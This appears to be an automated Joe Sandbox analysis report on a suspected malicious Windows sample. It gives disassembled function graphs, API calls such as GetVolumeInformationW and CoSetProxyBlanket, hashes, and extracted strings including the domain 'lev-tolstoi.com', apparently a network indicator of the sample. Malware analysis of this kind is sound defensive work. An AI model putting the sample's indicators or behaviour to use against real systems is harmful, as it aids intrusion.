                                                                                                                                                                                                                                  control_flow_graph 497 9d9280-9d92a4 498 9d92b0-9d92d7 497->498 498->498 499 9d92d9-9d92ef 498->499 500 9d92f0-9d9322 499->500 500->500 501 9d9324-9d936a 500->501 502 9d9370-9d938c 501->502 502->502 503 9d938e-9d93a7 502->503 505 9d93ad-9d93b6 503->505 506 9d942a-9d9435 503->506 507 9d93c0-9d93d9 505->507 508 9d9440-9d947b 506->508 507->507 509 9d93db-9d93ee 507->509 508->508 510 9d947d-9d94de 508->510 511 9d93f0-9d941e 509->511 514 9d94e4-9d9515 510->514 515 9d9906-9d9932 call 9dfe00 GetVolumeInformationW 510->515 511->511 513 9d9420-9d9425 511->513 513->506 516 9d9520-9d954d 514->516 520 9d993c-9d993e 515->520 521 9d9934-9d9938 515->521 516->516 518 9d954f-9d9576 SysAllocString 516->518 524 9d957c-9d9596 CoSetProxyBlanket 518->524 525 9d98f5-9d9902 518->525 523 9d9950-9d9957 520->523 521->520 526 9d9959-9d9960 523->526 527 9d9970-9d998f 523->527 528 9d959c-9d95b4 524->528 529 9d98eb-9d98f1 524->529 525->515 526->527 530 9d9962-9d996e 526->530 531 9d9990-9d99b2 527->531 532 9d95c0-9d961e 528->532 529->525 530->527 531->531 533 9d99b4-9d99ca 531->533 532->532 535 9d9620-9d969f 532->535 536 9d99d0-9d9a06 533->536 541 9d96a0-9d96ff 535->541 536->536 537 9d9a08-9d9a2e call 9be960 536->537 542 9d9a30-9d9a37 537->542 541->541 543 9d9701-9d972d 541->543 542->542 544 9d9a39-9d9a4c 542->544 552 9d98d6-9d98e7 SysFreeString * 2 543->552 553 9d9733-9d9755 543->553 545 9d9940-9d994a 544->545 546 9d9a52-9d9a65 call 9a7fd0 544->546 545->523 549 9d9a6a-9d9a71 545->549 546->545 552->529 555 9d98cc-9d98d2 553->555 556 9d975b-9d975e 553->556 555->552 556->555 557 9d9764-9d9769 556->557 557->555 558 9d976f-9d97b7 557->558 560 9d97c0-9d97d4 558->560 560->560 561 9d97d6-9d97e0 560->561 562 9d97e4-9d97e6 561->562 563 9d97ec-9d97f2 562->563 564 9d98bb-9d98c8 562->564 563->564 565 9d97f8-9d9806 563->565 564->555 566 9d983d 565->566 567 9d9808-9d980d 565->567 570 9d983f-9d9877 call 9a7f50 call 9a8e10 566->570 569 9d981c-9d9820 567->569 571 9d9810 569->571 572 9d9822-9d982b 569->572 581 9d9879-9d988f 570->581 582 9d98a7-9d98b7 call 9a7f60 570->582 574 9d9811-9d981a 571->574 575 9d982d-9d9830 572->575 576 9d9832-9d9836 572->576 574->569 574->570 575->574 576->574 578 9d9838-9d983b 576->578 578->574 581->582 584 9d9891-9d989e 581->584 582->564 584->582 585 9d98a0-9d98a3 584->585 585->582
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00001F7A), ref: 009D9551
                                                                                                                                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009D958F
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32 ref: 009D98DF
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 009D98E5
                                                                                                                                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 009D992E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                  • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                  • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                  • Opcode ID: f5ce40dbcd51953b72315ee2da8e76620a0b5064f5ea8a9d24f8d502ee3b57ca
                                                                                                                                                                                                                                  • Instruction ID: 3e0f54c261b5c042ab9bb3d27abb4d82862023e9a1a8e7719dc38fb0e97568c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5ce40dbcd51953b72315ee2da8e76620a0b5064f5ea8a9d24f8d502ee3b57ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6224172A483419BD310DF28C880B5BBBE6EFC5714F18C92DE9949B3A1D775D841CB82
                                                                                                                                                                                                                                  Function 009AB100 Relevance: 19.2, Strings: 15, Instructions: 425COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 587 9ab100-9ab18b 588 9ab190-9ab199 587->588 588->588 589 9ab19b-9ab1ae 588->589 591 9ab40b-9ab40f 589->591 592 9ab4be-9ab4c7 589->592 593 9ab52f-9ab538 589->593 594 9ab1bc-9ab3db 589->594 595 9ab4f6-9ab4fd 589->595 596 9ab414-9ab4b7 call 9a7e30 589->596 597 9ab4e4-9ab4ef 589->597 598 9ab1b5-9ab1b7 589->598 622 9ab6d3-9ab6dc 591->622 624 9ab4ce-9ab4df 592->624 625 9ab4ff-9ab52a call 9dfe00 592->625 621 9ab540-9ab56a 593->621 620 9ab3e0-9ab3eb 594->620 618 9ab572-9ab592 595->618 596->592 596->593 596->595 596->597 599 9ab65e-9ab668 596->599 600 9ab6fe-9ab710 596->600 601 9ab79f 596->601 602 9ab69c-9ab6b1 596->602 603 9ab792-9ab79a 596->603 604 9ab6f0-9ab6f1 596->604 605 9ab610-9ab61e 596->605 606 9ab717-9ab732 call 9de0a0 596->606 607 9ab5f7-9ab60e call 9dfe00 596->607 608 9ab748-9ab76d 596->608 609 9ab789 596->609 610 9ab689-9ab697 596->610 611 9ab76f 596->611 612 9ab66f-9ab687 call 9dfe00 596->612 613 9ab782 596->613 614 9ab5e3-9ab5f0 596->614 615 9ab623-9ab640 596->615 616 9ab780 596->616 617 9ab647-9ab657 596->617 597->593 597->595 597->599 597->600 597->601 597->602 597->603 597->604 597->605 597->606 597->607 597->608 597->609 597->610 597->611 597->612 597->613 597->614 597->615 597->616 597->617 619 9ab6df-9ab6e6 598->619 599->605 599->607 599->610 599->612 600->601 600->605 600->606 600->607 600->608 600->609 600->610 600->611 600->612 600->613 600->616 629 9ab7a2-9ab7a9 601->629 627 9ab6ba-9ab6bd 602->627 603->604 647 9ab6f8 604->647 605->627 639 9ab737-9ab741 606->639 607->605 632 9ab774-9ab77a 608->632 609->603 610->629 611->632 612->610 613->609 614->605 614->607 615->599 615->600 615->601 615->602 615->603 615->604 615->605 615->606 615->607 615->608 615->609 615->610 615->611 615->612 615->613 615->616 615->617 617->599 617->600 617->601 617->602 617->603 617->604 617->605 617->606 617->607 617->608 617->609 617->610 617->611 617->612 617->613 617->616 637 9ab5a0-9ab5bd 618->637 620->620 631 9ab3ed-9ab3f8 620->631 621->621 636 9ab56c-9ab56f 621->636 622->619 634 9ab6c6-9ab6d0 624->634 625->634 627->634 629->627 649 9ab3fb-9ab404 631->649 632->616 634->622 636->618 637->637 646 9ab5bf-9ab5dc 637->646 639->601 639->605 639->607 639->608 639->609 639->610 639->611 639->612 639->613 639->616 646->599 646->600 646->601 646->602 646->603 646->604 646->605 646->606 646->607 646->608 646->609 646->610 646->611 646->612 646->613 646->614 646->615 646->616 646->617 647->600 649->591 649->592 649->593 649->595 649->596 649->597 649->599 649->600 649->601 649->602 649->603 649->604 649->605 649->606 649->607 649->608 649->609 649->610 649->611 649->612 649->613 649->614 649->615 649->616 649->617
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                  • API String ID: 0-620192811
                                                                                                                                                                                                                                  • Opcode ID: 295277e7a73b3a7ecd703f7ee76c7e14709795ee21be7544395bd0efa1f4f213
                                                                                                                                                                                                                                  • Instruction ID: 82c56543865aaa47048400fff3370f473ae00ed4157b33bdf43f3ca6791ae132
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 295277e7a73b3a7ecd703f7ee76c7e14709795ee21be7544395bd0efa1f4f213
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC0267B1114B41CFD724CF25D891B9BBBF1FB45314F018A2CD5AA8BAA1D734A844DF90
                                                                                                                                                                                                                                  Function 009B1227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 656 9b1227-9b123f 657 9b1241-9b1244 656->657 658 9b1280-9b12ae call 9a1870 657->658 659 9b1246-9b127e 657->659 662 9b12b0-9b12b3 658->662 659->657 663 9b12fd-9b1327 call 9a1870 662->663 664 9b12b5-9b12fb 662->664 667 9b132b-9b132f 663->667 668 9b1329-9b1364 call 9b4850 663->668 664->662 670 9b1d26-9b2744 call 9a1f30 667->670 676 9b1368-9b13a9 call 9a7f50 call 9aa8d0 668->676 677 9b1366 668->677 686 9b13ab-9b13ae 676->686 677->676 687 9b13fa-9b141e call 9a1870 686->687 688 9b13b0-9b13f8 686->688 691 9b1420-9b1459 call 9b4850 687->691 692 9b1486-9b14b6 call 9b4850 687->692 688->686 697 9b145b 691->697 698 9b145d-9b1481 call 9a7f50 call 9aa8d0 691->698 699 9b14ba-9b155f call 9a7f50 call 9aa8d0 RtlExpandEnvironmentStrings 692->699 700 9b14b8 692->700 697->698 698->692 708 9b1562-9b1565 699->708 700->699 709 9b156b-9b15fa 708->709 710 9b15ff-9b1615 708->710 709->708 711 9b162d-9b1646 710->711 712 9b1617-9b1628 call 9a7f60 710->712 714 9b164a-9b16ac call 9a7f50 711->714 715 9b1648 711->715 712->670 721 9b16db-9b1704 call 9a7f60 714->721 722 9b16ae-9b16d6 call 9a7f60 * 2 714->722 715->714 730 9b1706-9b1709 721->730 745 9b1d24 722->745 732 9b170b-9b173d 730->732 733 9b173f-9b175a call 9a1870 730->733 732->730 739 9b175c-9b1788 call 9b4850 733->739 740 9b17b6-9b17d7 733->740 748 9b178a 739->748 749 9b178c-9b17b4 call 9a7f50 call 9aa8d0 739->749 743 9b17da-9b17dd 740->743 746 9b1818-9b185e call 9a1b80 743->746 747 9b17df-9b1816 743->747 745->670 754 9b1860-9b1863 746->754 747->743 748->749 749->740 756 9b18b8-9b18e5 call 9a1a80 754->756 757 9b1865-9b18b6 754->757 761 9b18ec-9b1930 call 9a1f30 756->761 762 9b18e7 756->762 757->754 767 9b1932 761->767 768 9b1934-9b194d call 9a7f50 761->768 763 9b1bf1-9b1c75 call 9a8b60 call 9b57c0 762->763 772 9b1c7a-9b1c89 call 9a9780 763->772 767->768 775 9b196f-9b1975 768->775 776 9b194f-9b1956 768->776 782 9b1c8b-9b1c9a 772->782 783 9b1cc7-9b1cfa call 9a7f60 * 2 772->783 777 9b1977-9b1979 775->777 779 9b1958-9b1964 call 9b4980 776->779 780 9b197b-9b197f 777->780 781 9b1984-9b19c4 call 9a1f40 777->781 794 9b1966-9b196d 779->794 780->763 796 9b19c6-9b19c9 781->796 786 9b1c9c 782->786 787 9b1cb5-9b1cc5 call 9a7f60 782->787 814 9b1cfc-9b1cff call 9a7f60 783->814 815 9b1d04-9b1d0e 783->815 791 9b1c9e-9b1caf call 9b4b10 786->791 787->783 804 9b1cb3 791->804 805 9b1cb1 791->805 794->775 800 9b19cb-9b1a0c 796->800 801 9b1a0e-9b1a55 call 9a1870 796->801 800->796 810 9b1a57-9b1a5a 801->810 804->787 805->791 812 9b1a79-9b1ac8 call 9a1870 810->812 813 9b1a5c-9b1a77 810->813 821 9b1aca-9b1acd 812->821 813->810 814->815 818 9b1d18-9b1d1f call 9a8c40 815->818 819 9b1d10-9b1d13 call 9a7f60 815->819 818->745 819->818 824 9b1acf-9b1af4 821->824 825 9b1af6-9b1b48 call 9a1b80 821->825 824->821 828 9b1b4a-9b1b4d 825->828 829 9b1b4f-9b1b7a 828->829 830 9b1b7c-9b1bec call 9a1b80 call 9b49a0 828->830 829->828 830->777
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                  • API String ID: 0-4163809010
                                                                                                                                                                                                                                  • Opcode ID: d05ed21dae8b5c736380831899518d6525db0c149316c87c83cb3363d6787bac
                                                                                                                                                                                                                                  • Instruction ID: 17f660dd5f8b8f88ee62c55244a54a09af2be470c4944937bc6119e757318e41
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d05ed21dae8b5c736380831899518d6525db0c149316c87c83cb3363d6787bac
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58528F7260C7808FD3249B38C5953EFBBE1ABD6320F594A2EE4D9C7391D67889458B43
                                                                                                                                                                                                                                  Function 009D8EA0 Relevance: 15.3, Strings: 12, Instructions: 287COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 835 9d8ea0-9d8ec3 836 9d8ec5-9d8ec8 835->836 837 9d8eca-9d8f2e 836->837 838 9d8f30-9d8f50 836->838 837->836 839 9d8f52-9d8f55 838->839 840 9d8f57-9d8fb4 839->840 841 9d8fb6-9d8fba 839->841 840->839 842 9d8fbc-9d8fc7 841->842 843 9d8fc9 842->843 844 9d8fcb-9d8fe4 842->844 845 9d9036-9d9039 843->845 846 9d8fe8-9d8ff3 844->846 847 9d8fe6 844->847 850 9d903d-9d9042 845->850 851 9d903b 845->851 848 9d9028-9d902d 846->848 849 9d8ff5-9d9023 call 9de110 846->849 847->848 853 9d902f 848->853 854 9d9031-9d9034 848->854 849->848 855 9d9048-9d9068 850->855 856 9d9264-9d9271 850->856 851->850 853->845 854->842 857 9d906a-9d906d 855->857 859 9d906f-9d90cc 857->859 860 9d90ce-9d90d2 857->860 859->857 861 9d90d4-9d90df 860->861 862 9d90e1 861->862 863 9d90e3-9d90fc 861->863 864 9d9160-9d9163 862->864 865 9d90fe 863->865 866 9d9100-9d910b 863->866 869 9d9165 864->869 870 9d9167-9d9171 864->870 867 9d914f-9d9154 865->867 866->867 868 9d910d-9d9145 call 9de110 866->868 874 9d9158-9d915b 867->874 875 9d9156 867->875 877 9d914a 868->877 869->870 871 9d9175-9d917d 870->871 872 9d9173 870->872 876 9d9180-9d91a0 871->876 872->876 874->861 875->864 878 9d91a2-9d91a5 876->878 877->867 879 9d91a7-9d9200 878->879 880 9d9202-9d9206 878->880 879->878 881 9d9208-9d920e 880->881 882 9d9210 881->882 883 9d9212-9d9224 881->883 884 9d9262 882->884 885 9d9228-9d922e 883->885 886 9d9226 883->886 884->856 887 9d9256-9d9259 885->887 888 9d9230-9d9252 call 9de110 885->888 886->887 889 9d925d-9d9260 887->889 890 9d925b 887->890 888->887 889->881 890->884
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                  • API String ID: 0-1108506012
                                                                                                                                                                                                                                  • Opcode ID: 26fc2d38e390254bda215354504ce2628c5bdc6537bcdd1988bd14e5babf4bc3
                                                                                                                                                                                                                                  • Instruction ID: 8e6b3ccbf66eb86ec86d3700fae5110278f4929be66a59086a0736ee137d4ea5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26fc2d38e390254bda215354504ce2628c5bdc6537bcdd1988bd14e5babf4bc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BB1287168C3818FD3149A28CC8436BBFD297D6324F1D8B1EE5E9473D2C6B9C8858746
                                                                                                                                                                                                                                  Function 009ACE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 893 9ace45-9ace78 call 9d3fd0 call 9a9780 CoUninitialize 898 9ace80-9acee4 893->898 898->898 899 9acee6-9acef7 898->899 900 9acf00-9acf20 899->900 900->900 901 9acf22-9acf64 900->901 902 9acf70-9acf92 901->902 902->902 903 9acf94-9acf9c 902->903 904 9acfbb-9acfc3 903->904 905 9acf9e-9acfa2 903->905 907 9acfdb-9acfe6 904->907 908 9acfc5-9acfc6 904->908 906 9acfb0-9acfb9 905->906 906->904 906->906 910 9ad08a 907->910 911 9acfec-9acfed 907->911 909 9acfd0-9acfd9 908->909 909->907 909->909 913 9ad08d-9ad095 910->913 912 9acff0-9acff9 911->912 912->912 914 9acffb 912->914 915 9ad0ad 913->915 916 9ad097-9ad09b 913->916 914->913 917 9ad0b0-9ad0bb 915->917 918 9ad0a0-9ad0a9 916->918 919 9ad0cb-9ad0d7 917->919 920 9ad0bd-9ad0bf 917->920 918->918 921 9ad0ab 918->921 923 9ad0d9-9ad0db 919->923 924 9ad0f1-9ad1b1 919->924 922 9ad0c0-9ad0c9 920->922 921->917 922->919 922->922 925 9ad0e0-9ad0ed 923->925 926 9ad1c0-9ad1d2 924->926 925->925 927 9ad0ef 925->927 926->926 928 9ad1d4-9ad1f4 926->928 927->924 929 9ad200-9ad252 928->929 929->929 930 9ad254-9ad26b call 9ab7e0 929->930 932 9ad270-9ad28a 930->932
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                                                                                  • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                  • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                  • Opcode ID: 983d4131ee9a84aca49d2732a02f63308786cebb5e8d8f3639cbb5727e09bd11
                                                                                                                                                                                                                                  • Instruction ID: 41b050099873ab42eb195c7658197b1fc6b87f4d1394b4b17d794510f342508a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 983d4131ee9a84aca49d2732a02f63308786cebb5e8d8f3639cbb5727e09bd11
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93A1F1B42057818FD716CF29C4D0662BBE2FF97314B18859CC4D24F76AD735A846CB91
                                                                                                                                                                                                                                  Function 009A8600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 938 9a8600-9a8611 call 9dd9a0 941 9a8a48-9a8a4f ExitProcess 938->941 942 9a8617-9a861e call 9d62a0 938->942 945 9a8a31-9a8a38 942->945 946 9a8624-9a864a 942->946 947 9a8a3a-9a8a40 call 9a7f60 945->947 948 9a8a43 call 9de080 945->948 954 9a864c-9a864e 946->954 955 9a8650-9a887f 946->955 947->948 948->941 954->955 957 9a8880-9a88ce 955->957 957->957 958 9a88d0-9a891d call 9dc540 957->958 961 9a8920-9a8943 958->961 962 9a8964-9a897c 961->962 963 9a8945-9a8962 961->963 965 9a8a0d-9a8a25 call 9a9d00 962->965 966 9a8982-9a8a0b 962->966 963->961 965->945 969 9a8a27 call 9acb90 965->969 966->965 971 9a8a2c call 9ab7b0 969->971 971->945
                                                                                                                                                                                                                                  APIs
